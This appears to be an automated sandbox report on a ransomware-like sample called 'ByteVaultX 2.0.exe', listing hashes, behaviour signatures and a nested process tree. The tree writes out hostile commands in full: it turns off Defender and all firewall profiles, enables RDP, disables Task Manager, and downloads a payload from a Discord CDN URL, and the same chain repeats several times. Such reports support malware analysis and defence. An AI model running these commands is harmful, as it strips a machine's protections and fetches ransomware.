Resubmissions

26/05/2024, 16:12

240526-tnx32sda67 10

25/05/2024, 23:21

240525-3cacaaeh66 10

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/05/2024, 23:21

General

  • Target

    ByteVaultX 2.0.exe

  • Size

    9.9MB

  • MD5

    72c65f1b271ae812c9c00fe7dbef3ee7

  • SHA1

    98327e138efdcdbfcb02787ad3f9b729e617df6e

  • SHA256

    d1314cc2b3ddd84224b7b6fe78c9ca75dceed34799b6715086eeacd687e84017

  • SHA512

    21595d8bc9fe4c94a74b28acbe65e9a98f2c39e23d9e41bb5bfcaae01f11c11bfade391f04edd5853081c4ab1df051aa6f71c6203d7eac39b3446a3e357be273

  • SSDEEP

    196608:Th30RIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:mGFG8S1+TtIi+Y9Z8D8CclydoPx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&

Signatures

  • Renames multiple (143) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 15 IoCs
  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 64 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 12 IoCs
  • Drops desktop.ini file(s) 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

    Start PowerShell.

  • Sets desktop wallpaper using registry 2 TTPs 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
    "C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4660
    • C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
      "C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
      2⤵
      • Checks computer location settings
      • Loads dropped DLL
      • Drops desktop.ini file(s)
      • Suspicious use of WriteProcessMemory
      PID:1036
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1356
      • C:\Windows\SYSTEM32\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:3780
      • C:\Windows\SYSTEM32\runas.exe
        runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"
        3⤵
          PID:3560
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html
          3⤵
            PID:2180
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2068
            • C:\Windows\system32\reg.exe
              reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
              4⤵
                PID:3868
              • C:\Windows\system32\reg.exe
                reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                4⤵
                  PID:1336
                • C:\Windows\system32\reg.exe
                  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                  4⤵
                    PID:1916
                  • C:\Windows\system32\reg.exe
                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:1800
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1160
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5116
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3196
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1524
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5020
                    • C:\Windows\system32\netsh.exe
                      netsh firewall set opmode disable
                      4⤵
                        PID:1336
                      • C:\Windows\system32\netsh.exe
                        netsh firewall set opmode mode=DISABLE
                        4⤵
                        • Modifies Windows Firewall
                        PID:2700
                      • C:\Windows\system32\netsh.exe
                        netsh advfirewall set currentprofile state off
                        4⤵
                        • Modifies Windows Firewall
                        PID:4352
                      • C:\Windows\system32\netsh.exe
                        netsh advfirewall set domainprofile state off
                        4⤵
                        • Modifies Windows Firewall
                        PID:1800
                      • C:\Windows\system32\netsh.exe
                        netsh advfirewall set privateprofile state off
                        4⤵
                        • Modifies Windows Firewall
                        PID:1496
                      • C:\Windows\system32\netsh.exe
                        netsh advfirewall set publicprofile state off
                        4⤵
                        • Modifies Windows Firewall
                        PID:4628
                      • C:\Windows\system32\netsh.exe
                        netsh advfirewall set allprofiles state off
                        4⤵
                        • Modifies Windows Firewall
                        PID:3560
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4312
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2076
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2208
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1764
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2180
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3996
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                        4⤵
                        • Blocklisted process makes network request
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4552
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4332
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                          5⤵
                            PID:4504
                            • C:\Windows\system32\reg.exe
                              reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                              6⤵
                                PID:5032
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                6⤵
                                  PID:452
                                • C:\Windows\system32\reg.exe
                                  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                  6⤵
                                    PID:2208
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                    6⤵
                                      PID:2700
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                      6⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1496
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3612
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                      6⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1328
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2272
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                      6⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3232
                                    • C:\Windows\system32\netsh.exe
                                      netsh firewall set opmode disable
                                      6⤵
                                        PID:2700
                                      • C:\Windows\system32\netsh.exe
                                        netsh firewall set opmode mode=DISABLE
                                        6⤵
                                        • Modifies Windows Firewall
                                        PID:2076
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall set currentprofile state off
                                        6⤵
                                        • Modifies Windows Firewall
                                        PID:3412
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall set domainprofile state off
                                        6⤵
                                          PID:4880
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall set privateprofile state off
                                          6⤵
                                            PID:4324
                                          • C:\Windows\system32\netsh.exe
                                            netsh advfirewall set publicprofile state off
                                            6⤵
                                            • Modifies Windows Firewall
                                            PID:5012
                                          • C:\Windows\system32\netsh.exe
                                            netsh advfirewall set allprofiles state off
                                            6⤵
                                              PID:2208
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                              6⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:316
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                              6⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3360
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                              6⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4256
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                              6⤵
                                                PID:220
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                6⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2796
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                6⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4332
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                6⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:440
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                6⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Modifies registry class
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:748
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                  7⤵
                                                    PID:2988
                                                    • C:\Windows\system32\reg.exe
                                                      reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                      8⤵
                                                        PID:2700
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                        8⤵
                                                          PID:3196
                                                        • C:\Windows\system32\reg.exe
                                                          reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                          8⤵
                                                            PID:5032
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                            8⤵
                                                              PID:4552
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                              8⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:316
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                              8⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1552
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                              8⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4648
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                              8⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2076
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                              8⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2308
                                                            • C:\Windows\system32\netsh.exe
                                                              netsh firewall set opmode disable
                                                              8⤵
                                                                PID:4348
                                                              • C:\Windows\system32\netsh.exe
                                                                netsh firewall set opmode mode=DISABLE
                                                                8⤵
                                                                  PID:4904
                                                                • C:\Windows\system32\netsh.exe
                                                                  netsh advfirewall set currentprofile state off
                                                                  8⤵
                                                                    PID:1552
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh advfirewall set domainprofile state off
                                                                    8⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:2796
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh advfirewall set privateprofile state off
                                                                    8⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:4684
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh advfirewall set publicprofile state off
                                                                    8⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:4352
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh advfirewall set allprofiles state off
                                                                    8⤵
                                                                      PID:4504
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                      8⤵
                                                                        PID:220
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                        8⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4116
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                        8⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3984
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                        8⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2308
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                        8⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3944
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                        8⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1000
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                        8⤵
                                                                        • Blocklisted process makes network request
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4804
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                        8⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Modifies registry class
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2796
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                          9⤵
                                                                            PID:2108
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                              10⤵
                                                                                PID:1212
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                10⤵
                                                                                  PID:5032
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                  10⤵
                                                                                    PID:880
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                    10⤵
                                                                                      PID:4028
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                      10⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2700
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                      10⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2208
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                      10⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4804
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                      10⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4028
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                      10⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:316
                                                                                    • C:\Windows\system32\netsh.exe
                                                                                      netsh firewall set opmode disable
                                                                                      10⤵
                                                                                        PID:1212
                                                                                      • C:\Windows\system32\netsh.exe
                                                                                        netsh firewall set opmode mode=DISABLE
                                                                                        10⤵
                                                                                        • Modifies Windows Firewall
                                                                                        PID:4684
                                                                                      • C:\Windows\system32\netsh.exe
                                                                                        netsh advfirewall set currentprofile state off
                                                                                        10⤵
                                                                                        • Modifies Windows Firewall
                                                                                        PID:2700
                                                                                      • C:\Windows\system32\netsh.exe
                                                                                        netsh advfirewall set domainprofile state off
                                                                                        10⤵
                                                                                        • Modifies Windows Firewall
                                                                                        PID:4116
                                                                                      • C:\Windows\system32\netsh.exe
                                                                                        netsh advfirewall set privateprofile state off
                                                                                        10⤵
                                                                                          PID:452
                                                                                        • C:\Windows\system32\netsh.exe
                                                                                          netsh advfirewall set publicprofile state off
                                                                                          10⤵
                                                                                          • Modifies Windows Firewall
                                                                                          PID:4904
                                                                                        • C:\Windows\system32\netsh.exe
                                                                                          netsh advfirewall set allprofiles state off
                                                                                          10⤵
                                                                                          • Modifies Windows Firewall
                                                                                          PID:1804
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                          10⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4256
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                          10⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1716
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                          10⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4144
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                          10⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2796
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                          10⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4268
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                          10⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2872
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                          10⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4628
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                          10⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5016
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                            11⤵
                                                                                              PID:4348
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                12⤵
                                                                                                  PID:316
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                  12⤵
                                                                                                    PID:1328
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                    12⤵
                                                                                                      PID:4840
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                      12⤵
                                                                                                        PID:744
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                        12⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:404
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                        12⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3924
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                        12⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4480
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                        12⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1328
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                        12⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4324
                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                        netsh firewall set opmode disable
                                                                                                        12⤵
                                                                                                          PID:3924
                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                          netsh firewall set opmode mode=DISABLE
                                                                                                          12⤵
                                                                                                          • Modifies Windows Firewall
                                                                                                          PID:1804
                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                          netsh advfirewall set currentprofile state off
                                                                                                          12⤵
                                                                                                          • Modifies Windows Firewall
                                                                                                          PID:4752
                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                          netsh advfirewall set domainprofile state off
                                                                                                          12⤵
                                                                                                          • Modifies Windows Firewall
                                                                                                          PID:4224
                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                          netsh advfirewall set privateprofile state off
                                                                                                          12⤵
                                                                                                          • Modifies Windows Firewall
                                                                                                          PID:3360
